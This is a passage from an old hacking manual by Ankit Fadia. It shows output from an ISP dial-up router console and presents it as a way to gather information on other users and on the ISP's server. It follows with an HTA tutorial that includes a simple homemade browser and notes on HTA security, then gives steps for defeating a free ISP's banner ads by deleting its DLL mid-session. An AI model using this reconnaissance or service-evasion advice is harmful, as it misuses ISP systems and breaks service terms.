  2/15  00:10:41    1405    361      0      0       0        0     113     
79%
  2/16  00:12:44    1357    295      0      0       0        0      87     
82%
* 2/17  00:11:15    1362    355      0      0       0        1     102     
79%
  2/18  00:11:30    1363    343      0      0       0        1     105     
79%
  2/19  00:11:49    1349    350      0      0       0        1     110     
79%
* 2/20  00:11:40    1341    347      0      0       0        3     102     
79%
  2/21  00:11:40    1374    341      0      0       0        2      98     
80%
  2/22  00:11:41    1378    329      0      0       0        0     101     
80%
  2/23  00:12:35    1335    322      0      0       0        0     100     
80%
  2/24  00:12:33    1353    309      0      0       0        1      91     
81%
  2/25  00:11:36    1371    330      0      0       0        3     106     
80%
* 2/26  00:11:18    1403    332      0      0       0        1     107     
80%
* 2/27  00:11:56    1349    350      0      0       0        0     115     
79%
* 2/28  00:10:41    1421    340      0      0       0        0     110     
80%
  2/29  00:11:49    1352    326      0      0       0        0     116     
80%
--More--                           * 2/30  00:10:21    1446    353      0    
   0       0        1     120     80%
  2/31  00:11:33     853    219      0      0       0        0      69     
79%
  2/32  00:12:09    1361    339      0      0       0        0     101     
80%
  2/33  00:11:20    1388    346      0      0       0        1     113     
80%
  2/34  00:12:27    1340    312      0      0       0        0     106     
81%
  2/35  00:12:02    1348    340      0      0       0        3     101     
79%
  2/36  00:11:18    1368    349      0      0       0        4     111     
79%
  2/37  00:12:21    1346    320      0      0       0        2     116     
80%
  2/38  00:11:59    1377    330      0      0       0        1     108     
80%
  2/39  00:11:53    1406    303      0      0       0        0      98     
82%
* 2/40  00:12:39    1340    335      0      0       0        1      97     
80%
  2/41  00:11:20    1386    352      0      0       0        0     113     
79%
* 2/42  00:11:06    1384    351      0      0       0        2     111     
79%
* 2/43  00:12:15    1359    331      0      0       0        0     107     
80%
  2/44  00:12:04    1365    331      0      0       0        1      95     
80%
  2/45  00:11:04    1411    316      0      0       0        1      93     
81%
* 2/46  00:12:02    1338    349      0      0       0        2      97     
79%
  2/47  00:11:30    1396    345      0      0       0        0      91     
80%
* 2/48  00:11:04    1406    338      0      0       0        3     108     
80%
* 2/49  00:11:42    1368    349      0      0       0        0     114     
79%
  2/50  00:12:09    1329    339      0      0       0        2     112     
79%
* 2/51  00:11:56    1341    335      0      0       0        1     107     
80%
* 2/52  00:10:42    1376    372      0      0       0        4     110     
78%
--More--                             2/53  00:12:28    1309    345      0    
   0       0        1     122     79%
* 2/54  00:13:29    1315    295      0      0       0        1      90     
81%
  2/55  00:11:22    1379    363      0      0       0        2     114     
79%
* 2/56  00:13:40    1264    335      0      0       0        2      90     
79%
  2/57  00:11:03    1367    367      0      0       0        1     128     
78%
  2/58  00:10:58    1382    360      0      0       0        1     103     
79%
* 2/59  00:12:11    1372    313      0      0       0        3      88     
81%
Total:  00:11:45  163207  40377      0      0       6      146   12548     
80%

delhinas4>show clock

*16:19:42.948 UTC Sun Apr 16 2000

delhinas4>show terminal

Line 61, Location: "", Type: ""
Length: 24 lines, Width: 80 columns
Status: Ready, Active, No Exit Banner, Modem Detected
Capabilities: Hardware Flowcontrol In, Hardware Flowcontrol Out
  Modem Callout, Modem RI is CD, Line usable as async interface
  Output non-idle, Modem Autoconfigure, Integrated Modem
Modem state: Ready
  modem(slot/port)=2/0, state=CONNECTED
  dsx1(slot/unit/channel)=0/1/20, 
status=VDEV_STATUS_ACTIVE_CALL.VDEV_STATUS_ALLOCATED.
Modem hardware state: CTS DSR  DTR RTS, Modem Configured
Special Chars: Escape  Hold  Stop  Start  Disconnect  Activation
                ^^x    none   -     -       none
Timeouts:      Idle EXEC    Idle Session   Modem Answer  Session   Dispatch
               00:10:00       00:20:00                       none     not 
set
Session idle time reset by output.
                            Idle Session Disconnect Warning
                             00:01:00
                            Login-sequence User Response
                             00:00:30
                            Autoselect Initial Wait
                              not set
Modem type is new_modemcap3.
Session limit is not set.
--More--                           

delhinas4>show dialer

Serial0:0 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:1 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:2 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:3 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:4 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
--More--                           Wait for carrier (30 secs), Re-enable (15 
secs)
Dialer state is idle

Serial0:5 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:6 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:7 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:8 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

--More--                           Serial0:9 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:10 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:11 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:12 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:13 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
--More--                           Dialer state is idle

Serial0:14 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:15 - dialer type = ISDN

Dial String      Successes   Failures    Last called   Last status
0 incoming call(s) have been screened.
0 incoming call(s) rejected for callback.

Serial0:16 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:17 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

--More--                           Serial0:18 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:19 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:20 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:21 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:22 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
--More--                           Dialer state is idle

Serial0:23 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:24 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:25 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:26 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:27 - dialer type = ISDN
--More--                           Idle timer (600 secs), Fast idle timer 
(20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:28 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:29 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

Serial0:30 - dialer type = ISDN
Idle timer (600 secs), Fast idle timer (20 secs)
Wait for carrier (30 secs), Re-enable (15 secs)
Dialer state is idle

delhinas4>show snmp
Chassis: 11494401
646497 SNMP packets input
    0 Bad SNMP version errors
    0 Unknown community name
    0 Illegal operation for community name supplied
    1 Encoding errors
    2402516 Number of requested variables
    4 Number of altered variables
    8281 Get-request PDUs
    638211 Get-next PDUs
    4 Set-request PDUs
918646 SNMP packets output
    0 Too big errors (Maximum packet size 1500)
    67 No such name errors
    0 Bad values errors
    0 General errors
    646496 Response PDUs
    272150 Trap PDUs

SNMP logging: enabled
    Logging to 203.xx.243.63.162, 0/10, 270949 sent, 1201 dropped.

delhinas4>show history(This command displays a list of commands that you 
have typed since your last login.)
  show terminal
  how
  show tacas
  show dialer
  who
  mstat
  localhost
  help
  where
  show history

SO this way you can use the Post Dial Up Screen which I hope you would now 
call the Router Prompt to get more information on Users and also the Server 
of your ISP itself.

Making Your Own Browser (HTML APPLICATIONS)

I felt that this manual wasn't complete without a mention of HTA 
Applications.
HTA Applications are basically HTML Applications which are unfortunately 
supported only by Internet Explorer 4 and above.An HTA Application is 
actually a full fledged application.With the development of HTA's Internet 
Explorer can now be used for creating and distributing full fledged powerful 
applications over the net.Basically HTA's are a cross between normal .exe 
files and the web pages that are displayed by Internet Explorer.

Normally only proper programming languages like C++ or Perl or VisualBasic 
had the access to system resources, but with the introduction of HTA's, this 
power now extends to DHTML(Dynamic HyperText MarkUp Language).HTA not only 
supports everything that a normal webpage supports like, CSS (Cascading 
Style Sheets),scripting languages,methods behaviours etc, but also gives the 
developer access to the client's system, an opportunity to control the User 
Interface of the Application,and many various other aspects which we 
couldn't control earlier.Best of all, it runs as a  trusted application, 
which menas it is not tied down with the same security restrictions, normal 
web pages are subjected to.A HTA behaves like a normal .exe file, with the 
user being asked once, before the HTA is downloaded, whether to save or run 
the application; if saved to the client's system,it can be executed anytime 
later, just like a normal .exe file can be.

A HTA application is nothing but a .html file saved with a .hta extension 
name.The only difference between the commands that can be used on a web page 
and the commands that can be used on a HTA Application are the addition of 
some new commands which are native to HTA Applications.An HTA Application 
can be executed by either double-clicking its program icon, or running it 
from the Start menu, opening it through a URL, or by  starting it from the 
command line.

Now before we move on to HTA Specific commands, let's write the mandatory 
Hello World! Program.This program is just for the formality sake, so that 
you get the basic idea, as to how a HTA functions and it is Okay even if you 
do not understand anything yet.Just Copy the following piece of code and 
save it with any name of your choice, just make sure that

<HTML>
<TITLE>My First HTA</title>
<HEAD>
   <HTA:APPLICATION >
</HEAD>
<BODY SCROLL="yes">
Hello World!!!
</BODY>
</HTML>


The .hta extension tells the system ,how to handle this particular 
application.The new HTA:APPLICATION tells the application windows, how to 
behave as a application.This new tag has many attributes which give us 
complete control over the function and the Application Windows of our 
HTA.This new HTA:APPLICATION tag should appear within the HEAD tag and 
should contain the necesarry attributes which control features of the HTA 
which are not available in DHTML..Now to understand the HTA specific 
attributes, lets take the following example:

<HEAD>
  <TITLE>My First HTA Application</TITLE>
  <HTA:APPLICATION ID="htapp"
    APPLICATIONNAME="My First HTA APP"
    BORDER="none"
    CAPTION="yes"
    ICON="/icon.gif"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="yes"
    SYSMENU="no"
    WINDOWSTATE="maximize"
  >
</HEAD>

We conclude the following from the above piece of code:

1. When launched the HTA is known to the system as My First HTA 
APP(Controlled by Applicationname attribute.
2. The HTA App does not have a border.(Controlled by Border Attribute.) When 
border is set to none, neither the window border, program icon, title bar, 
nor Minimize and Maximize buttons will display.
3. The HTA App will have a title bar or a caption bar.(Controlled by Caption 
Attribute.) When CAPTION is set to no, the Minimize and Maximize buttons, 
the program icon, and the window border are disabled.
4. The Icon which is displayed in Explorer or in the taskbar or in the Title 
bar will be /icon.gif.(contolled by ICON attribute.)
5. The HTA App will not be shown in the taskbar.(Controlled by 
Showintaskbar.)
6. Only a single instance of the app can be launched at a particular 
time.(Controlled by Singleinstance.)
7. It will not have a standard system program icon.(Controlled by Sysmenu.) 
When sysMenu is set to no, not only the program icon, but also the Minimize 
and Maximize buttons are disabled.
8. The HTA Window will be by default launched maximised.
9. The id attribute works the same way, it normally does.

When the above HTA is run, it shows the text within the <TITLE> tag on the 
caption bar of tha application, and the code within the <BODY> tag is 
executed.

*********************
Hacking Truth: As HTA's are executed as fully trusted applications, they 
have the ability to carry out actions which Internet Explorer would never 
allow a regular web page to perform.HTA's have full permit to manipulate the 
client machine.It has read.write access to the client machine's files, and 
also the system registry.The command codes are also supported.They also 
allow cross domain scripting.
Not only that, they also allow embedded Java Applets and ActiveX Controls to 
be run without any warning message irrespective of the security settings of 
the browser.

To understand how HTA's security works, read the following excerpt from SBN:

------------------SBN--------------

HTA windows can extend the trust relationship to content in other domains. 
HTAs allow cross-domain script access between window objects and cookies. To 
address the security risks inherent in cross-domain scripting, HTA enables 
the APPLICATION attribute for FRAMEs and IFRAMEs. This HTA-only attribute is 
not the sole security precaution available. HTAs are designed such that 
FRAMEs and IFRAMEs, where the APPLICATION attribute is set to no, have no 
script access to the HTA containing them. In this way, no unsecure content 
is allowed into an HTA through an untrusted window.
HTAs are designed such that untrusted HTML FRAMEs and IFRAMEs have no script 
access to the HTA containing them. In the case of FRAMEs that are not 
HTA-enabled, the highest level frame comprises the top window for all FRAMEs 
it contains. For that FRAME, window.top and window.self are one and the 
same. In addition, unsafe FRAMEs and IFRAMEs receive neither a referrer nor 
an opener URL from the parent HTA. The end result is that they are unaware 
of the containing HTA as the parent window.
In applications where all content is safe, FRAMEs and IFRAMEs can safely be 
marked as trusted. Wizards and control panels are examples of safe content. 
The HTA-enabled status of the IFRAME in the example below permits it to pass 
information back to its parent window.
<IFRAME SRC="filename.htm" APPLICATION="yes">
By contrast, an IFRAME that allows browsing to unsecured content must be 
implemented as regular HTML. Content in the IFRAME example below is subject 
to the security setting for its zone. The following IFRAME can be used when 
embedding HTML.
<IFRAME SRC="filename.htm" APPLICATION="no">
Note The APPLICATION attribute is ignored if used in HTML rather than HTA.
When running HTAs, users should take the same precautions as with any 
executable: Only install HTAs produced by reliable sources. HTAs cannot be 
code-signed. However, they can be installed from signed cabinet (.cab) files 
or other signed installation formats. Either way, the most accountable 
sources will be corporate intranets and established software vendors.
-------------------------SBN----------------------------------

So one can see how dangerous from a normal person's viewpoint and how 
interesting from a hacker's viewpoint, HTA's can be.So basically to save 
yourself from evil Java Applets disable Java.Also run only those HTA's they 
are signed or you receive from trusted senders.

************************

The following is the code of a browser that actually is a HTA which I coded 
in HTML, Javascript.To understand how it was made and to improve the code, 
you will need basic knowledge of the two.
This browser is based on the open source concept and anyone can contribute 
to it's code and improve it's functionality.So all you hardcore programmers, 
charge your grey cells and conrtibute to the development of this browser.
All those of you who are new to hacking(programming)please, take my advice 
and learn atleast two or three programming language.For the time being use 
the below browser and start enjoying your browsing experience.Simple copy 
the following into notepad or anyother editor and save it with an extension 
name of .hta

<html>
<head>
  <TITLE>The Hacking Truths Browser.</TITLE>
  <HTA:APPLICATION
    APPLICATIONNAME="The Hacking Truths Browser."
    ICON="icon_name_here.ico"
    WINDOWSTATE="normal">
</head>

<body>
<span id=abar
style="overflow: none">
<span
id=AText><b>Address</b></span>
<input type=text
value=http://hackingtruths.tripod.com
       id=URL
      width="80"
       style="width: expression(document.body.clientWidth -
                                AText.offsetWidth -
                                AGo.offsetWidth -85)">

<input type=button
value="Go"
       id=AGo onclick="navigate()"><br>
<span>
<br>
<iframe
src="http://hackingtruths.tripod.com" id=data
        style="width:
100%; height: 85%"></iframe>

<script language=JScript>

function navigate() {
document.all.data.src = URL.value;
}

function clickShortcut() {
  if (window.event.keyCode == 13) {
     navigate()
  }
}


URL.onkeypress =
clickShortcut;

</script>
<br>Coded By: <b>Ankit Fadia</b> ankit@bol.net.in<br>Visit us at: <a 
href="http://hackingtruths.tripod.com">http://hackingtruths.tripod.com/a>
</body>
</html>

Removing Banners From Free ISP Services

There are many new Internet Service Providers which give absolutely free Internet access, of course you do need to pay for the telephone bill. These free ISP's make money by the advertisements that they display in the form of a banner which covers a part of your screen each time you connect to the Internet.

Well, these banners are quite a nuisance as they clog bandwidth and slow down our Internet Connection. The advertisements displayed by them, share your modem to load. Wanna learn how to remove this bar and still access the net for free? Well read on.

The answer to this hack lies in some kewl files called Dynamic Link Libraries. First lets see what .dll files are used for. Dynamic Link Libraries is basically a collection of commands or data which control how a program looks. Take the example of Microsoft Office. Now whenever you launch it, the main .exe file reads the .dll file associated with it and accordingly displays the toolbars.[NOTE: Almost all Windows applications use the same .dll file to display say the Title Bar]. So basically we can conclude that .dll files are most commonly used to change the way applications look.

Now the good thing about Dynamic Libraries is that they can be loaded or unloaded when a particular program has stopped using it. This is done to save resources or memory. They can also be shared at the same time by various applications.

Now before we go on to the hack let's learn how these free ISP's work.
When you click on the Connect button, the Modem dials into the FREE ISP and tries to connect. Before the connection is fully established, the FREE ISP software checks to see if the .dll file associated with exists or not. If yes, then it connects and a banner pops up. On the other hand, if the .dll file does not exist then the FREE ISP Software refuses to connect. So what you need to do in order to surf for free without the irritating Banner ads, first connect to the FREE ISP's server, and once the connection has been established (screeching sound stops), delete the .dll file associated with it. It is that simple. The only thing you need to know is which .dll file to delete. 

To find out the .dll files associated with your FREE ISP Software, install the software on a clean machine (where the same software has not been installed earlier). Then using the FIND tool (START >Find) locate all Dynamic Link Libraries (*.dll)which have been created or modifies during the last one day(Under the Date Modified Tab). This will be foolproof only if no other software has been installed during the last 24 hours.

Ankit Fadia
ankit@bol.net.in

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